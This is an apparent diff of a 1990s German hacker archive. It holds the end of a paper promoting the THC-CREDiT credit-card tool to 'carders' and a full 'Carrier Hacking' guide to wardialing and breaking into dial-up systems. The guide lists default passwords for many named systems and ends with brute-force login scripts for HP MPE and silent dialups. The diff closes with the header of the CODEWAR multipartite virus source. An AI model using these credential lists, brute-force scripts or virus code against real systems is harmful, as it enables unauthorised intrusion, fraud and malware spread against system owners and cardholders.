+Wie auch immer, ich sollte eben ueber iRC interviewt werden und einen Abend
+danach wurde es gesendet, ein Uni Professor hat auch noch etwas gegen die KK
+Firmen gewettert und ich hoffe sie standen wenigstens am Ende als die Boesen
+da, ich versteh ja nun leider kein hollaendisch... Wie auch immer, Geld
+wollte ich fuer den Muell keins, ich bin ja kein geldgeiler Sack, ich wollte
+nur eine Videokopie des Beitrags, ist wohl ein fairer Deal... Wenn sich jetzt
+wieder jemand aufregt, dass welche aus der H/P Szene im Fernsehen auftreten,
+dann denkt daran was ich geschrieben hab, wer weiss was die sonst aus dem
+Beitrag gemacht haetten, allein schon der Satz den ihr ja nachher auch noch
+lesen koennt: "Was sagen Sie dazu, dass sie mit ihrem Programm Millionen-
+schaeden verursachen?" Nunja, ich meine mit solchen Meinungen muss man doch
+aufraeumen, inzwischen bin ich noch mit dem Reporter in Kontakt und er seit
+er sich etwas damit beschaeftigt, sieht er den Hauptschuldigen und Feind der
+Menschheit in den KK Firmen, woran man mal wieder sieht, dass es auch gute
+Reporter gibt, man darf Bild und RTL Reporter eben nicht als Mass fuer den
+ganzen Beruf nehmen. Nun werde ich einige Auszuege aus dem IRC Capture
+herausziehen und frei uebersetzen... Wenn sich jemand wirklich fuer das ganze
+Capture interessiert soll er sich eben bei mir melden.
+Der Freund des Reporters, der das Interview letztendlich durchgefuehrt hatte,
+nannte sich im IRC "Inter" soviel im vorraus zur Erklaerung.
+
+[...]
+
+<inter>   Naechste Frage, warum benuetzt Du einen Decknamen und nicht
+          Deinen echten Namen? Warum Namen wie GemFire?
+
+<GemFire> Aus Sicherheitsgruenden, Ich mache nichts illegales, aber vielleicht
+          wissen das einige nicht. Ich hab keine Lust, dass die Polizei mein
+          Haus durchwuehlt.
+
+<inter>   Ok, das ist ein guter Grund  ;-)
+
+[...]
+
+<inter>   Was ist das Hauptziel von Programmen wie THC-CREDiT ?
+
+<GemFire> Fuer mich ist es ein Hobby, ich weiss was moeglich ist, ich weiss
+          mehr als normale Leute. Vielleicht benutzen es manche Leute fuer
+          illegale Zwecke, aber THC-CREDiT allein begeht kein Verbrechen!
+
+<inter>   Aber weisst Du nicht, wieviel Schaden Du mit diesem Programm
+          anrichtest?
+
+<GemFire> Weisst DU wieviel Schaden ich damit anrichte? Wie gesagt, das
+          Programm richtet keinen Schaden an, nur der es fuer illegale
+          Zwecke missbraucht. Es gibt genug Programme wie dieses, meins
+          ist vielleicht eines der besten, aber bei weitem nicht das
+          Einzige. In der Anleitung wird darauf hingewiesen, dass KK
+          Betrug strafbar ist und der Zweck des Programmes nicht darin
+          liegt.
+
+<inter>   Ja, aber es ist hilfreich, wenn man damit Geld machen will...
+
+[...]
+
+<inter>   z.B. ViSA verliert 1,2 Milliarden pro Jahr, sagt Dir das etwas?
+
+(Anmerkung: Hier hab ich im Prinzip das gleiche geantwortet wie weiter oben
+ in diesem Text, dass sie ja selbst nicht mehr Sicherheit wollen, weil sie
+ das System lieber moeglichst einfach lassen wollen, weil es sonst den Kunden
+ zu kompliziert wird.)
+
+[...]
+
+<inter>   Visa sagt, es wird Hacker wie Dich eliminieren.
+
+(Anmerkung: Nun, das ist nun wieder ein lustiges Statement von VISA, hehe.)
+
+Naja, es ging dann noch eine Weile um Anti-Fraud Systeme, im Prinzip nichts
+anderes als ich sowieso schon geschrieben hab, also will ich niemanden damit
+langweilen. Abschliessend moechte ich noch sagen, dass diese Stellen die ich
+rausgegriffen hab nicht stellvertretend fuer das Gespraech waren, er hat am
+Ende schon kapiert, wer recht hat, naja und diese Statements hab ich eben
+genommen, weil sie besonders krass waren... Wollte ich nur fairerweise sagen
+denn dieser Reporter war kein Arschloch und wenn ich nur Teile rausgreife,
+dann stell ich das auch so dar... Nicht wie z.B. andere Reporter, die etwas
+auszugsweise bringen und damit den ganzen Sinn veraendern...
+
+Nun noch zum letzten Thema, wie erreicht man mich...
+
+E-MAiL: gemfire@drmland.muc.de      
+
+VMB   : Ja, ich hab noch eine VMB, aber da ich will, dass es sie noch laenger
+        gibt sag ich nur, die Leute die sie kennen, koennen mir eine Nachricht
+        hinterlassen.
+
+BOARD : TERMiNAL MADNESS, die Daten findet Ihr im THC.NFO
+
+iNET  : http://credit.home.ml.org
+
+Nun, da faellt mir noch was ein, am 01.06. kommt voraussichtlich
+THC-CREDiT v1.9 mit vollem CARD READER/WRiTER SUPPORT!!! Das darf der
+interessierte Carder nicht verpassen...
+
+Und noch etwas zum Schluss, ich hab einen neuen PGP-Key, da der alte bei einem
+kleinen Crash verlorengegangen ist.
+
+beachtet bitte, dass die genannte email adresse im PGP key noch nicht
+existiert, es jdeoch hoffentlich in diesem Jahr noch wird. Bitte
+benutzt die obige email adresse : gemfire@drmland.muc.de
+
+Type Bits/KeyID    Date       User ID
+pub  1024/AF4154C5 1996/12/02 GemFire/THC <gemfire@insecurity.org>
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3ia
+
+mQCNAzKiRGkAAAEEAOjPt6acZdELdaLdJJo9Hh5gXZTP0VQvEeFFJmSRlLHLyHNR
+wquxbmM5F0JqpauC8+Xa3Xd8ZmmeOjYQ2jatSKef2cJVOaxfIJzNu60tWUS3HNC2
+d2tUwhIzT8Yf2OpUVXRoLB+BRgsvVCGu7PhxCj7L30cnN8iY45u1TfivQVTFAAUR
+tCRHZW1GaXJlL1RIQyA8Z2VtZmlyZUBpbnNlY3VyaXR5Lm9yZz6JAJUDBRAyokRp
+m7VN+K9BVMUBAavxBADQCiCAT4Zg5XphMR15cGP+bQUMNZKRypptHL1j7kcyDjj8
+40NYBpjCZoJmTeEUJQXRHxBAem3Paan/K2dq/6y0Rec0S5x4pR1f4GQtF3DTEYFs
+d2nmnume2qaAKWhVRTiDBHpJL/9Q3x6/FXabfTBwx/6bZoddWTDzJX0ZlF3pew==
+=b5Nn
+-----END PGP PUBLIC KEY BLOCK-----
+

Papers/carriers.txt

@@ -0,0 +1,884 @@
+
+
+
+
+                              CARRIER HACKING
+
+                                 by Giemor
+
+
+
+
+
+
+Warum Carrier Scanning/Hacking
+------------------------------
+
+In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA 
+sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken.
+Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom.
+Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet
+und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve,
+IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich
+dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270,
+FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc...
+Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder
+nicht-oeffentliche in die man sich social-engineered) einloggen und mit
+Kumpels leicht Software austauschen oder man versucht herauszufinden, was
+sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt. 
+
+
+
+Wie findet man Carriers
+-----------------------
+
+Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen.
+(thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten 
+Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes
+finden kann, uns aber speziell hier die gefundenen Modems interessieren.
+Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity, 
+data length, stop bits, ausprobiert sowie breaks sendet, <cr>, <.> etc. und 
+schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem
+ausgibt in einer Logdatei speichert.
+Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt,
+da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann.
+
+
+
+Was sind Silent Carriers
+------------------------
+
+Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System
+muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation,
+oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch
+eingestellt. 
+a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1.
+   die meisten Systeme benutzten 8N1, 7E1 und 7O1.
+b) aendert die Terminal emulation: 
+   
+   IBM 3101                    TV 910              BEEHIVE ATL078
+   IBM PC/FTTERM COLOR         LS ADM3A            UDT01
+   IBM PC/FTTERM MONO          ADDS VP             UDT02
+   IBM 3161/62/63              HAZEL 1500          UDT03
+   IBM 3151                    HAZEL ESP I         UDT04
+   IBM 3164                    HAZEL ESP II        UDT05
+   VT52                        NT DISPLAY          ANSI
+   VT100                       TT 5410             ANSI-BBS
+   VT220                       TT 5420
+   FALCO 500                   HP 2621B            Qmodem Pro unterstuetzt
+   WYSE 50                     DG D210                diese Emulationen 
+                                              
+c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal
+   Programm unterstuetzt.
+d) drueckt oefters hinter einander, <cr>, esc, .' sendet mehrere breaks, 
+e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen,
+   und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am
+   besten ein Zyxel und ein USR Courier, aeltere Modelle reichen.
+f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e
+   versagt ;-)
+   
+
+
+Ich habe ein System gefunden
+----------------------------
+
+Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat.
+Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil.
+Dann kann man z.B. alle standart Accounts durchprobieren.
+Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte
+man deren Produkte oder Mitarbeiter Namen als login und Password
+versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force 
+Hacking uebrig. Man probiert mit einem programm alle moeglichen 
+Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man
+macht das an einem System wo man endlos eingabe versuche hat. Ein gutes
+Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige
+System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript
+gibts dazu im Anhang.
+
+
+
+Suspend/Command Modus
+---------------------
+
+Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter
+etc. etc. - nur haben sie vielleicht etwas uebersehen :
+Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft
+noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim
+Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O"
+die Verbindung weiter benutzen kann. Andere Programme lassen sich in den
+Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix)
+Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+
+sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29).
+Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so
+einen Command modus bietet oder das System was einen das Programm suspenden
+laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell,
+also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche
+Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B.
+einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk
+abscannen oder sogar hacken.
+
+
+
+Sonderfall: Internet
+--------------------
+
+Besonders interessant sind Rechner die am Internet angeschlossen sind.
+Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen
+hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem
+Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet
+in den Host oder das Netzwerk hineinzukommen.
+Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards)
+die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und
+darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert.
+Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder
+traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder
+aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist
+die Finger davon lassen.
+
+-------------------------------capture----------------------------------------
+CONNECT 14400/ARQ/MNP5
+Trying ...
+Connected to 192.354.24.5
+Escape character is '^]'.
+
+UNIX(r) System V Release 4.0 (sisy500)
+
+Login:
+-------------------------------capture----------------------------------------
+
+
+
+Systeme mit standart Accounts
+-----------------------------
+
+------------------------------------------------------------------------------
+DECserver Communications Server
+
+DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1
+
+Local -010- Session 1 to ZYNET1 established
+
+Login:
+PASSWORD:
+
+Local -011- Session 1 disconnected from ZYNET1
+hello>
+
+Standart Accounts:
+------------------
+ACCESS
+SYSTEM
+
+Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2
+------------------------------------------------------------------------------
+Xyplex Terminal Server.
+
+Enter username> 
+Local> 
+  
+Standart Accounts:
+------------------
+ACCESS
+SYSTEM
+------------------------------------------------------------------------------
+
+Annex Command Line Interpreter  *  Copyright 1991 Xylogics, Inc
+
+Checking authorization, Please wait...
+Annex username:                  (Enter your NCI userid)
+Annex password:                  (Enter your NCI password)
+Permission granted
+Annex:
+
+Befehl   Parameter                     Beschreibung
+---------------------------------------------------
+?        ? []                          :Hilfe
+bg       bg [-dq] [%][%,+,-,,]         :Eine Aktion in Hintergrund setzen
+fg       fg [-q] [%][%,+,-,,]          :zurueck zu einer aktuellen Aktion
+hangup   hangup [-q]                   :Auflegen und Port reseten
+help     help []                       :Hilfe
+jobs     jobs                          :Zeigt aktuelle Aktionen an
+kill     kill [%][%,+,-,,]...          :Kille eine Aktion
+stty     stty [parameter [value]]...   :Show/Set Annex Port Parameter
+telnet   telnet [-rsst] [ [port]]      :Starte Telnet Connection
+who      who [[-l] []@ ...]            :Zeigt System User
+
+Standart accounts:
+------------------
+guest     guest
+------------------------------------------------------------------------------
+
+ROLM PhoneMail 9252 9254 Microcode Version 5.2
+Login: ?
+Valid login modes are:
+SYSADMIN,
+TECH,
+POLL.
+Login:tech
+Password:tech
+ROLM PhoneMail 9252 9254 Microcode Version 5.2
+Copyright (C) ROLM Systems 1991
+All Rights Reserved.
+Aktion:
+
+       ( Mit den Befehl "?" oder help kommt man zum folgenden menue)
+
+               The following commands are valid:
+  Activate <session #>         - Activate the session
+  Broadcast                    - Broadcast a message to all terminals
+  Connect <subsystem> <node #> - Invoke the subsystem
+  Terminate <session #>        - Terminate the session
+  List                         - List all open sessions
+  Logout                       - Terminate all sessions and log off.
+  Login <login mode>           - Logout and login again.
+  Display                      - Display sessions status on a site.
+  TechView <on/off>            - Enable/Disable TechView training.
+------------------------------------------------------------------
+Beschreibung aus TFC05:
+
+ActivatePM       :    Starts the Phone Mail system.
+AssignClasses    :    External program to assign COS to each user in the
+                      database. Only local non-Call Processing users are
+                      assigned classes.
+BackupDataBase   :    Create a backup of the customer database on HD or
+                      floppies.
+BackupNames      :    Copies name header information for all subscribers to
+                      a floppy/floppies.
+CallProcessing   :    An external program to create and maintain Mailbox
+                      Profiles.
+ChannelTrace     :    Lists the current state of each channel. Continously
+                      updates until interrupted.
+DeactivatePM     :    Turn off PM system. DON'T USE THIS UNLESS YOU ARE
+                      VERY SURE OF WHAT YOU ARE DOING! Calls will no
+                      longer be taken by the PM if it is deactivated.
+DList            :    Show distribution lists.
+FFormat          :    Format a floppy disk. The single most useless command
+                      for a remote user.
+LogOff           :    Quit session and go to session manager menu.
+MonitorLogon     :    Monitor users logging in to PM.
+MonitorTapLink   :    Shows tap traffic on CBX integrated systems. Continues
+                      to update until interrupted.
+OCConfigAndTest  :    Utility to configure and test all outcalling
+                      related parameters.
+Profile          :    Add All Clear Delete Fix List Modify Purge
+Reports          :    Display reports.
+CallActivity     :    Displays call activity by the hour, with averages.
+
+Standart accounts
+-----------------
+sysadmin  sysadmin
+operator  operator
+poll      poll oder tech
+tech      tech oder operator
+
+Info:
+Eine genaue Beschreibung ueber dieses System giebt es in TFC #5
+------------------------------------------------------------------------------
+
+ROLM CBX II
+
+ROLM CBXII  RELEASE 9004.2.34 RB295 9000D IBMHO27568
+BIND DATE:  7/APR/93
+COPYRIGHT 1980, 1993 ROLM COMPANY.  ALL RIGHTS RESERVED.
+ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
+YOU HAVE ENTERED CPU 1
+12:38:47 ON WEDNESDAY 2/15/1995
+
+USERNAME: op
+
+PASSWORD:
+
+ INVALID USERNAME-PASSWORD PAIR
+
+Standart Accounts:
+------------------
+op              op
+op              operator
+su              super
+admin           pwp
+eng             engineer
+------------------------------------------------------------------------------
+
+ARC NetBlazer Version 2.1
+ARC-login:
+
+Standart Accounts:
+------------------
+test
+setup
+remote
+snmp
+MAV
+------------------------------------------------------------------------------
+
+Telebit's NetBlazer Version 2.0x5
+netblzr2 login:
+
+Standart Accounts:
+------------------
+test
+setup
+remote
+snmp
+MAV
+------------------------------------------------------------------------------
+
+IFG's VAX 8650
+
+%SECURE-I-NET, Incoming number logged by Secure-net
+
+Username: 
+Password:
+Welcome to VAX 8650
+$
+
+Standart Accounts:
+------------------
+Vax
+Vms
+Dcl
+Demo
+Test
+Help
+News
+Guest
+Decnet
+Systest
+Uetp
+Default
+User
+Field
+Service
+System
+Manager
+Operator
+------------------------------------------------------------------------------
+HP 3000
+
+MPE XL:
+MPE XL:HELLO
+Expected [session name,] user.acct [,group]. (CIERR 1424)
+MPE XL:hello mgr.sys
+ENTER ACCOUNT (SYS) PASSWORD:
+ENTER ACCOUNT (SYS) PASSWORD:
+ENTER ACCOUNT (SYS) PASSWORD:
+
+Standart Accounts:
+------------------
+HELLO           MANAGER.SYS
+HELLO           MGR.SYS
+HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
+HELLO           OP.OPERATOR
+MGR             CAROLIAN
+MGR             CCC
+MGR             CNAS
+MGR             CONV
+MGR             COGNOS
+OPERATOR        COGNOS
+MANAGER         COGNOS
+OPERATOR        DISC
+MGR             HPDESK
+MGR             HPWORD
+FIELD           HPWORD
+MGR             HPOFFICE
+SPOOLMAN        HPOFFICE
+ADVMAIL         HPOFFICE
+MAIL            HPOFFICE
+WP              HPOFFICE
+MANAGER         HPOFFICE
+MGR             HPONLY
+FIELD           HPP187
+MGR             HPP187
+MGR             HPP189
+MGR             HPP196
+MGR             INTX3
+MGR             ITF3000
+MANAGER         ITF3000
+MAIL            MAIL
+MGR             NETBASE
+MGR             REGO
+MGR             RJE
+MGR             ROBELLE
+MANAGER         SECURITY
+MGR             SECURITY
+FIELD           SERVICE
+MANAGER         SYS
+MGR             SYS
+PCUSER          SYS
+RSBCMON         SYS
+OPERATOR        SYS
+OPERATOR        SYSTEM
+FIELD           SUPPORT
+OPERATOR        SUPPORT
+MANAGER         TCH
+MAIL            TELESUP
+MANAGER         TELESUP
+MGR             TELESUP
+SYS             TELESUP
+MGE             VESOFT
+MGE             VESOFT
+MGR             WORD
+MGR             XLSERVER
+
+Ein Login Hacker Script gibt es im Anhang
+------------------------------------------------------------------------------
+
+System75
+
+Login: root
+INCORRECT LOGIN
+
+Login: browse
+Password:
+
+Software Version: G3s.b16.2.2
+
+Terminal Type (513, 4410, 4425): [513]
+
+Standart Accounts:
+------------------
+bcim            bcimpw
+bciim           bciimpw
+bcms            bcmspw, bcms
+bcnas           bcnspw
+blue            bluepw
+browse          looker, browsepw
+craft           crftpw, craftpw, crack
+cust            custpw
+enquiry         enquirypw
+field           support
+inads           indspw, inadspw, inads
+init            initpw
+kraft           kraftpw
+locate          locatepw
+maint           maintpw, rwmaint
+nms             nmspw
+rcust           rcustpw
+support         supportpw
+tech            field
+------------------------------------------------------------------------------
+AIX
+
+IBM AIX Version 3 for RISC System/6000
+(C) Copyrights by IBM and by others 1982, 1990.
+login:
+
+Standart Accounts:
+------------------
+guest     guest
+------------------------------------------------------------------------------
+
+AS/400
+
+UserID?
+Password?
+
+Standart Accounts:
+------------------
+qsecofr         qsecofr
+qsysopr         qsysopr
+qpgmr           qpgmr     
+ibm             password
+ibm             2222
+ibm             service
+qsecofr         1111111
+qsecofr         2222222
+qserv           qserv
+qsvr            qsvr
+secofr          secofr
+qsrv            ibmce1
+------------------------------------------------------------------------------
+
+
+Systeme ohne Standart Accounts
+------------------------------
+
+CDC Cyber
+
+WELCOME TO THE NOS SOFTWARE SYSTEM.
+COPYRIGHT CONTROL DATA 1978, 1987.
+
+88/02/16. 02.36.53. N265100
+CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
+FAMILY:
+
+You would normally just hit return at the family prompt.  Next prompt is:
+
+USER NAME:
+------------------------------------------------------------------------------
+
+Cisco Router
+
+cisco_router_1>                        (kann jeder beliebige Promt sein)
+cisco_router_1>LOGIN
+Username:
+Password:
+------------------------------------------------------------------------------
+
+GTN
+
+WELCOME TO CITIBANK. PLEASE SIGN ON.
+XXXXXXXX
+
+@
+PASSWORD =
+
+@
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+PLEASE ENTER YOUR ID:-1->
+PLEASE ENTER YOUR PASSWORD:-2->
+
+CITICORP (CITY NAME). KEY GHELP FOR HELP.
+  XXX.XXX
+ PLEASE SELECT SERVICE REQUIRED.-3->
+------------------------------------------------------------------------------
+
+Lantronix Terminal Server
+
+Lantronix ETS16 Version V3.1/1(940623)
+
+Type HELP at the 'Local_15> ' prompt for assistance.
+
+Login password>
+------------------------------------------------------------------------------
+
+NIH Timesharing
+
+NIH Tri-SMP 7.02-FF  16:30:04 TTY11
+system 1378/1381/1453 Connected to Node Happy(40) Line # 12
+Please LOGIN
+.
+------------------------------------------------------------------------------
+
+VM/ESA ONLINE
+
+                                          TBVM2 VM/ESA Rel 1.1     PUT 9200
+
+Fill in your USERID and PASSWORD and press ENTER
+(Your password will not appear when you type it)
+USERID   ===>
+PASSWORD ===>
+
+COMMAND  ===>
+------------------------------------------------------------------------------
+
+
+
+ANHANG:
+
+Login Hacker Scripts:
+---------------------
+
+[BEGIN hp_mpe.txt]
+;
+;
+; ------------------------------------------------------------------------
+;  HP MPE-XL      : SAC-Script for THC-Login-Hacker v1.0  (by van Hauser)
+; ------------------------------------------------------------------------
+;
+;
+; MPE XL:
+; EXPECTED A :HELLO COMMAND. (CIERR 6057)
+; MPE XL: hello
+; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
+;
+; 
+=============================================================================
+#DEFINE
+PHONE_NR=*
+LOGFILE=*.log
+DIAL_TRIES=100
+LOGIN_TRIES=0
+DIC(1)=hp_mpe_a.dic
+; uncomment command lines below to check for 6 more common MPE passwords
+
+#NOCARRIER
+LOG(CARRIER LOST on $DATE at $TIME)
+
+LOG()
+GOTO(1)
+
+#START
+LOG(--------------------------------------------------------------------------)
+LOG( TARGET : $PHONE_NR )
+LOG( DATE : $DATE )
+LOG( TIME : $TIME )
+LOG()
+LOG_SESSION_ON
+SET D_TMP=1
+SET S_TMP=X
+
+:1
+SET STRING=X
+DIAL
+WAIT(1)
+IF STRING~XL THEN GOTO(2)
+WAIT4STRING(2,^M,6,GOTO(1),XL)
+
+:2
+SET STRING=X
+
+SEND_(HELLO )
+IF D_TMP=1 THEN SEND_(ADVMAIL.)
+IF D_TMP=2 THEN SEND_(FIELD.)
+IF D_TMP=3 THEN SEND_(MAIL.)
+IF D_TMP=4 THEN SEND_(MANAGER.)
+IF D_TMP=5 THEN SEND_(MGE.)
+IF D_TMP=6 THEN SEND_(MGR.)
+IF D_TMP=7 THEN SEND_(OP.)
+IF D_TMP=8 THEN SEND_(OPERATOR.)
+IF D_TMP=9 THEN SEND_(PCUSER.)
+IF D_TMP=10 THEN SEND_(RSBCMON.)
+IF D_TMP=11 THEN SEND_(SPOOLMAN.)
+IF D_TMP=12 THEN SEND_(SYS.)
+IF D_TMP=13 THEN SEND_(WP.)
+
+IF S_TMP=X THEN SEND_NEXT_DIC(1)
+IF S_TMP=Y THEN SEND_DIC(1)
+IF S_TMP=Z THEN SEND_DIC(1)
+IF S_TMP=A THEN SEND_DIC(1)
+; IF S_TMP=B THEN SEND_DIC(1)
+; IF S_TMP=C THEN SEND_DIC(1)
+
+IF D_TMP=13 THEN SET S_TMP=X
+IF D_TMP=13 THEN SET D_TMP=1
+WAIT(1)
+; set this higher if the system response is slow
+IF STRING2~HELLO THEN GOTO(3)
+IF STRING2~exists THEN GOTO(3)
+IF STRING2~on-ex THEN GOTO(4)
+IF STRING2~ASSW THEN GOTO(5)
+WAIT(2)
+IF STRING2~HELLO THEN GOTO(3)
+IF STRING2~exists THEN GOTO(3)
+IF STRING2~on-ex THEN GOTO(4)
+IF STRING2~ASSW THEN GOTO(5)
+GOTO(1)
+
+:3
+INC(D_TMP)
+GOTO(2)
+
+:4
+SET S_TMP=X
+SET D_TMP=1
+
+:5
+IF S_TMP=Z THEN GOTO(6)
+IF S_TMP=A THEN GOTO(7)
+;IF S_TMP=B THEN GOTO(8)
+;IF S_TMP=C THEN GOTO(9)
+SET S_TMP=Z
+LOG_($DIC(1))
+SEND_DIC(1)
+WAIT(1)
+LOG_(HPOnly)
+SEND(HPOnly)
+WAIT(1)
+LOG_(HP)
+SEND(HP)
+WAIT(2)
+GOTO(1)
+
+:6
+SET S_TMP=A
+LOG_(MPE)
+SEND(MPE)
+
+LOG_(Manager)
+SEND(Manager)
+WAIT(1)
+LOG_(mgr)
+SEND(mgr)
+WAIT(2)
+GOTO(1)
+
+:7
+SET S_TMP=X
+; SET S_TMP=B
+LOG_(remote)
+SEND(remote)
+WAIT(1)
+LOG_(TeleSup)
+SEND(TeleSup)
+WAIT(1)
+LOG_(operator)
+SEND(operator)
+WAIT(2)
+GOTO(1)
+
+
+; SET S_TMP=C
+; LOG_(tech)
+; SEND(tech)
+; WAIT(1)
+; LOG_(mail)
+; SEND(mail)
+; WAIT(1)
+; LOG_(hpoffice)
+; SEND(hpoffice)
+; WAIT(2)
+; GOTO(1)
+
+; :9
+; SET S_TMP=X
+; LOG_(sys)
+; SEND(sys)
+; WAIT(1)
+; LOG_(security)
+; SEND(security)
+; WAIT(1)
+; LOG_(support)
+; SEND(support)
+; LOG_(hpoffice)
+; SEND(hpoffice)
+; WAIT(2)
+; GOTO(1)
+
+; :9
+; SET S_TMP=X
+; LOG_(sys)
+; SEND(sys)
+; WAIT(1)
+; LOG_(security)
+; SEND(security)
+; WAIT(1)
+; LOG_(support)
+; SEND(support)
+
+; GOTO(1)
+
+:100
+LOG()
+LOG( END OF : $PHONE_NR )
+LOG(--------------------------------------------------------------------------)
+#END
+[END]
+
+
+
+[BEGIN hp_mpe_a.dic]
+CAROLIAN
+CCC
+CNAS
+COGNOS
+CONV
+DISC
+HP
+HPDESK
+HPOFFICE
+HPONLY
+HPP187
+HPP189
+HPP196
+HPUNSUP
+HPWORD
+INTX3
+ITF3000
+MAIL
+NETBASE
+OPERATOR
+REGO
+RJE
+ROBELLE
+HPP187
+HPP189
+HPP196
+HPUNSUP
+HPWORD
+INTX3
+ITF3000
+MAIL
+NETBASE
+OPERATOR
+REGO
+RJE
+ROBELLE
+SERVICE
+SUPPORT
+SYS
+SYSTEM
+TCH
+TELESUP
+VESOFT
+WORD
+XLSERVER
+[END]
+
+
+[BEGIN silent.txt]
+;
+;
+; ------------------------------------------------------------------------
+;  Silent Dialups : SAC-Script for THC-Login-Hacker v1.0  (by van Hauser)
+; ------------------------------------------------------------------------
+;
+; Silent Dialups : No output/response from dialup modem
+;                  (both types, 30 sec hangup & unlimited)
+;
+; (takes approx. 9-10 hours)
+;
+; 
+=============================================================================
+#DEFINE
+PHONE_NR=####
+LOGFILE=####
+DIAL_TRIES=50
+LOGIN_TRIES=0
+BRUTE(1)=^$,1,1,3
+; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length.
+
+#NOCARRIER
+CHECK4OUTPUT(OFF)
+LOG(CARRIER LOST on $DATE at $TIME)
+
+LOG()
+LOG()
+GOTO(1)
+
+#START
+LOG(--------------------------------------------------------------------------)
+LOG( TARGET : $PHONE_NR )
+LOG( DATE : $DATE )
+LOG( TIME : $TIME )
+LOG()
+LOG_SESSION_ON
+
+:1
+DIAL
+WAIT(1)
+CHECK4OUTPUT(99)
+
+:2
+SEND_NEXT_BRUTE(1)
+WAIT_(255)
+;waits 255ms between every attempt
+GOTO(2)
+CHECK4OUTPUT(99)
+
+:2
+SEND_NEXT_BRUTE(1)
+WAIT_(255)
+;waits 255ms between every attempt
+GOTO(2)
+
+:99
+CHECK4CARRIER(OFF)
+WAIT(5)
+CHECK4CARRIER(#NOCARRIER)
+
+:100
+HANGUP
+BEEP
+BEEP
+BEEP
+LOG()
+LOG()
+LOG( FOUND : $BRUTE(1))
+LOG(--------------------------------------------------------------------------)
+#END
+[END]
+
+

Papers/codewar.txt

@@ -0,0 +1,1732 @@
+;-------------------------------------------------------------------------
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;                        C O D E W A R  V i r u s
+;
+;
+;                   Programming by Sirius & Mindmaniac
+;
+;
+;                             Germany 1995.
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;---------------------------------------------------------------------------
+;
+;
+;
+;  Please note:
+; --------------
+;
+;  This programme introduces into the technique of multipartite viruses.
+;  Pass to responsible people only!
+;
+;
+;
+;
+;
+;   Features:
+; -------------
+;
+;  - Infection Type: - COM files,
+;                    - EXE files
+;                    - Master Boot Record (MBR) on Hard Disk Drives
+;                    - Boot Sector (BS) on Floppy Disk Drives
+;                      ( 1.44 Mb + 1.2 Mb )
+;
+;
+;  - Encryption:     3-layer-enryption (generic)
+;
+;  - Memory resident (Bootsector virus technique)
+;
+;  - Retro features.
